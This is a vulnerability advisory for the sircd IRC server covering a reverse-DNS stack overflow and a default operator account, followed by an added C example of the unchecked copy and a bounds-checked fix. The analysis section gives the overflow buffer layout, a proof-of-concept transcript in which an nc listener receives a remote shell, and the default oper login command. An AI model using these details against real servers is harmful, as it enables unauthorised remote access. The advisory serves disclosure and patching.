I. BACKGROUND

According to the vendor: "The 'sircd' project started as an idea from the QuakeNet IRC Network coding team to develop a completely new irc server that had none of the problems of the original ircd, such as instability, scalability issues, redundant, badly written code and other nasty things." More info is available at http://www.sircd.org.

II. DESCRIPTION

a: Insufficient bounds checking leads to execution of arbitrary code.
b: Default oper account matching *!*@*

III. ANALYSIS

a: Upon checking the reverse dns of a connecting user, if the returned value is longer than a certain length a classic stack overflow occurs. The buffer may be constructed as such:

[94 bytes of crap][EBP ][EIP ][400 bytes for nops and shellcode]

leaving us with plenty of space both before and after eip to store our shellcode. The accompanying .sh script is a silly proof of concept. Below is a fabricated copy of a typical run:

[shell 1]
$ nc -l -v -p 10000
listening on [any] 10000 ...

[shell 2]
# ./sircd.sh 127.0.0.1
sircd 0.4.0 proof-of-concept, usage ./sircd.sh
UID check passed, backing up /etc/hosts
Now connect to the sircd from 127.0.0.1
Press a key and enter to restore /etc/hosts
asd
Game over man, game over
#

[shell 3]
$ sircd &
[1] 75711
$
=====================================
sircd: v0.4.0 Alpha
Author(s) Zarjazz (zarjazz@barrysworld.com)
=====================================
sircd initialized
SSL initialized
$ BitchX 127.0.0.1
[snip some bitchx output]
[fi] *** Welcome to the_server
[fi] *** Resolving IP 127.0.0.1
--from here on the connection freezes.

[shell 2]
fah
Game over man, game over
#

[shell 1]
connect to [127.0.0.1] from [garbage snipped] [127.0.0.1] 1869
id
uid=1001(sircd-user) gid=1001(sircd-user) groups=1001(sircd-user)

b: type /oper bod bod bod in a connected irc-client.

IV. DETECTION

sircd-0.4.0 shipping with FreeBSD ports as per 03/02-03 is found to be vulnerable, as well as sircd-0.4.4 from CVS before 04/02-03.

V. WORKAROUND

The fix has been incorporated in the CVS tree as per 04/02-03.

VI. VENDOR FIX

Same as above.

VII. CVE INFORMATION

unknown

VIII. DISCLOSURE TIMELINE

03/02-02 zarjazz@barrysworld.com, ports@freebsd.org notified.
04/02-02 zarjazz@barrysworld.com responded with a fix.
04/02-02 public disclosure.

IX. CREDIT

Knud Erik Højgaard
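The bug class in section III.a, as an added illustration that is not sircd's code: a resolver result copied into a fixed-size buffer with no length check, beside a bounds-checked replacement that rejects names that do not fit. The buffer size HOSTLEN (set to the 94 bytes the advisory mentions before EBP), the struct and the function names are assumptions made for this example; the sample hostnames are constructed.

```c
/* Added example, not sircd's code. HOSTLEN, struct client and the
 * function names are assumptions for illustration. */
#include <stdio.h>
#include <string.h>

#define HOSTLEN 94  /* assumed fixed buffer size, matching the 94 bytes the advisory names */

struct client {
    char host[HOSTLEN];
};

/* Vulnerable pattern: the reverse-DNS result is copied into a fixed-size
 * buffer with no length check. A PTR record longer than HOSTLEN overruns
 * the buffer and overwrites whatever the compiler placed after it. */
static void set_host_unchecked(struct client *c, const char *resolved)
{
    strcpy(c->host, resolved);   /* no bounds check */
}

/* Hardened form: refuse anything that does not fit (including the NUL)
 * and copy with an explicit length. Returns 1 if stored, 0 if rejected;
 * on rejection an ircd would fall back to the numeric IP. */
int set_host_checked(struct client *c, const char *resolved)
{
    size_t n = strlen(resolved);
    if (n == 0 || n >= HOSTLEN)
        return 0;
    memcpy(c->host, resolved, n + 1);
    return 1;
}

/* Demonstration helper: build a name of the given length and report
 * whether the checked path accepts it. */
int accepts_hostname_of_length(size_t len)
{
    char name[1024];            /* constructed test input */
    struct client c;
    if (len >= sizeof name)
        return 0;
    memset(name, 'a', len);
    name[len] = '\0';
    return set_host_checked(&c, name);
}

int main(void)
{
    struct client c;
    const char *short_name = "host.example.net";  /* constructed sample */
    char long_name[600];                          /* constructed: exceeds the 94-byte buffer */
    memset(long_name, 'A', sizeof long_name - 1);
    long_name[sizeof long_name - 1] = '\0';

    /* The unchecked copy only behaves because this input is short. */
    set_host_unchecked(&c, short_name);
    printf("unchecked copy of short name: %s\n", c.host);

    printf("checked copy of short name: %s\n",
           set_host_checked(&c, short_name) ? "accepted" : "rejected");
    printf("checked copy of %zu-byte name: %s\n", strlen(long_name),
           set_host_checked(&c, long_name) ? "accepted" : "rejected");
    return 0;
}
```

The length check belongs at the resolver boundary, before the name reaches any fixed-size field; truncating silently instead of rejecting is also safe for memory but can produce a hostname that no longer matches what a forward lookup would return, so rejecting and falling back to the IP is the simpler policy.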